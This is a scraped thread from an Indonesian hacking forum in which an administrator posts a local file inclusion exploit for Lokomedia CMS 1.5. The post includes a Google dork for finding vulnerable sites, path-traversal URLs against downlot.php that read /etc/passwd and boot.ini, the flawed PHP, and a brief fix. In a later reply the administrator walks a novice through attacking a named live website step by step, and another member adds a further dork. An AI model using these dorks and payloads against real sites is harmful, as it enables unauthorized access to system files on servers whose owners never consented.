Devilzc0de Forum Follow @devilzc0de
  • Home
  • Hacking
  • Networking
  • Programming
  • O.S
  • Server
  • Tweets
  • Search
  • Member List
  • Calendar
Current time: 06-19-2013, 07:46 PM Hello There, Guest! (Login — Register)
Devilzc0de Forum › Information Technology › Hacking › Exploit v
« Previous 1 ... 5 6 7 8 9 ... 16 Next »

Lokomedia CMS 1.5 Local file Inclution

Home General Computer Multimedia Business Lounge

Post Reply 
Tweet
Threaded Mode | Linear Mode
Lokomedia CMS 1.5 Local file Inclution
04-04-2011, 01:17 AM (This post was last modified: 04-04-2011 01:20 AM by wenkhairu.)
Post: #1
wenkhairu Offline
Administrator
*******
Administrators
Posts: 1,345
Joined: Dec 2009
Reputation: 262
Lokomedia CMS 1.5 Local file Inclution
Code:
# Exploit Title    : Lokomedia CMS 1.5 Local file Inclution
# Google Dork      : "2011 Powered By Lokomedia"
# Date        : 2011/03/04
# Author        : unkn0w
# Webiste        : http://devilzc0de.org
# Software Link    : http://bukulokomedia.com/lokomedia-1.5.rar
# Version        : 1.5 (posible to all version)
# Tested on    : windows XP, windows 7, ubuntu 10.10

Code:
Gratz to All devilzc0de crew & intern0t crew & indonesia

Code:
Exploit & POC
-------------------
http://host/downlot.php?file=[LFI]
http://host/downlot.php?file=../../../../../boot.ini
http://host/downlot.php?file=../../../../../etc/passwd

PHP Code:
#bug on downlot.php
$filename = $_GET['file'];# -> [ not filtered ] 
$file_extension = strtolower(substr(strrchr($filename,"."),1)); #-> [ tidak memeriksa jenis extensi yang asli ]
if ($file_extension=='php') #-> [ hanya string php (bukan mime), kemungkinan bisa di bypass dengan null byte %00 ] 

PHP Code:
#simple way to fix the bug
$filetipe = array('pdf','rar','zip','doc','png','jpeg','jpg','ppt','exe');
if(!
in_array($file_extension,$filetipe)){
    
// your code
} 
Visit this user's website Find all posts by this user
Quote this message in a reply
04-04-2011, 01:19 AM
Post: #2
badwolves1986 [RJ] Offline
Staf Registrasi DIC
RJ
Posts: 2,908
Joined: Oct 2010
Reputation: 91
RE: Lokomedia CMS 1.5 Local file Inclution
ajibbbb mantap bang tak cobain dulu hmm
Find all posts by this user
Quote this message in a reply
04-04-2011, 03:13 AM
Post: #3
od3yz Offline
"Brondong Metal Devilzc0de"
Posts: 911
Joined: Mar 2011
Reputation: 62
RE: Lokomedia CMS 1.5 Local file Inclution
wah kaka dewa post, mantap kaka,izin pelajari kaka
wenk wank wonk samar emang ajiippppp
mantap
Visit this user's website Find all posts by this user
Quote this message in a reply
04-04-2011, 12:26 PM
Post: #4
selfdefense Offline
./Devilz Commodore
Posts: 1,294
Joined: Aug 2010
Reputation: 58
RE: Lokomedia CMS 1.5 Local file Inclution
mantap mastah wenk.. ijin nyimak dan.. belajar

ane mo nge patch web kampus ane euy.. soalnya pake loko juga..m

makasih.. smiley_beer
Find all posts by this user
Quote this message in a reply
04-04-2011, 12:34 PM
Post: #5
supermenganteng Offline
SPA Holic
********
Jendral Team
Posts: 1,961
Joined: Jun 2010
Reputation: -188
RE: Lokomedia CMS 1.5 Local file Inclution
dewa ne
Find all posts by this user
Quote this message in a reply
04-04-2011, 06:05 PM
Post: #6
1ngk4 Offline
./Devilz 1st Cadet
Posts: 27
Joined: Jan 2011
Reputation: 0
RE: Lokomedia CMS 1.5 Local file Inclution
maaf cara gunaiinya bgaimna yah om stress

bisa kasih penjelasan secara sederhan ga omsabar
Find all posts by this user
Quote this message in a reply
04-04-2011, 06:31 PM
Post: #7
wenkhairu Offline
Administrator
*******
Administrators
Posts: 1,345
Joined: Dec 2009
Reputation: 262
RE: Lokomedia CMS 1.5 Local file Inclution
(04-04-2011 06:05 PM)1ngk4 Wrote:  maaf cara gunaiinya bgaimna yah om stress

bisa kasih penjelasan secara sederhan ga omsabar

tinggal cari di google dengan dork "2011 By Lokomedia"

trus kalo dapet, masuk halaman downlot.php

misal ini webnya
Code:
http://nursanah.com

trus masuk ke halaman download
Code:
http://nursanah/downlot.php?file=belajar_cinta.zip

trus rubah urlnya jadi
Code:
http://nursanah/downlot.php?file=../../../../../etc/passwd
Visit this user's website Find all posts by this user
Quote this message in a reply
08-09-2011, 04:48 AM
Post: #8
Syamil007 Offline
./Devilz Officer
Posts: 68
Joined: Jul 2011
Reputation: 0
RE: Lokomedia CMS 1.5 Local file Inclution
wah ini nih sumber ilmu.....
mangstab om....
asikasik
Find all posts by this user
Quote this message in a reply
08-09-2011, 05:30 AM
Post: #9
hakimoxz Offline
./Devilz Advisor
Posts: 870
Joined: Jul 2011
Reputation: 47
RE: Lokomedia CMS 1.5 Local file Inclution
Quote:tinggal cari di google dengan dork "2011 By Lokomedia"

trus kalo dapet, masuk halaman downlot.php

misal ini webnya
Code:
http://nursanah.com

trus masuk ke halaman download
Code:
http://nursanah/downlot.php?file=belajar_cinta.zip

trus rubah urlnya jadi
Code:
http://nursanah/downlot.php?file=../../../../../etc/passwd

kalau bug ini apa dah lama ?
caranya apa sam?
Code:
allinurl:/media.php?module=berita
Visit this user's website Find all posts by this user
Quote this message in a reply
« Next Oldest | Next Newest »
Post Reply 


Topic Tools
Topic Link :
BBCode :
HTML Code :
View a Printable Version Send Thread to a Friend Subscribe to this thread
Submit Google Submit Face book Submit to Digg Submit to Reddit Submit to Furl Submit to Del.icio.us Submit to Jeqq

Possibly Related Threads...
Thread: Author Replies: Views: Last Post
Bug [Tutor] Com_kunena Upload file ohara_inamiji 12 631 05-26-2013 07:41 AM
Last Post: Crabboy
  DOS ip pada local area dengan ettercap dxfandy19 11 177 04-21-2013 02:19 PM
Last Post: ghosthands
Thumbs Up [Tutor] POC + Exploit Wordpress ~ Video Blogging Arbitrary File Upload Regel 11 718 02-02-2013 12:19 AM
Last Post: copaker21
  Butuh Local Exploit Kernel Server AnonymousOpsID 2 180 11-24-2012 08:37 PM
Last Post: AnonymousOpsID
  #DiyWeb Admin Bypass dan Remote file/shell Upload exploit AnonymousOpsID 4 353 11-06-2012 05:07 PM
Last Post: rock_me
  kernel-2.6.18-164 2010 Local Root Exploit numlock 5 356 08-11-2012 11:37 PM
Last Post: d4rk_kn19ht
Bug CMS Schoolhos - Remote Arbitrary File Upload nuxbie_cyber 10 357 06-28-2012 06:47 PM
Last Post: Loex
  belajar bareng local exploit alessandra 17 809 04-14-2012 09:10 PM
Last Post: jackerp
  KasKus File Upload Vulnerability ? rusuh 24 1,065 04-13-2012 05:23 PM
Last Post: KING_cobra
Thumbs Up [Localroot Exploit] Linux Kernel CVE-2012-0056 Local Privilege Escalation Regel 3 217 02-14-2012 10:54 PM
Last Post: Regel

Users Browsing
1 Guest(s)

  • Contact Us
  • devilzc0de
  • Return to Top
  • Mobile Version
  • RSS Syndication
  • Help
Current time: 06-19-2013, 07:46 PM Powered By MyBB, © 2002-2013 MyBB Group. Theme created by Justin S. | Mixed By Chaer.Newbie | Fixed By Aditya

USING THIS SITE INDICATES THAT YOU HAVE READ AND ACCEPT OUR TERMS. IF YOU DO NOT ACCEPT THESE TERMS, YOU ARE NOT AUTHORIZED TO USE THIS SITE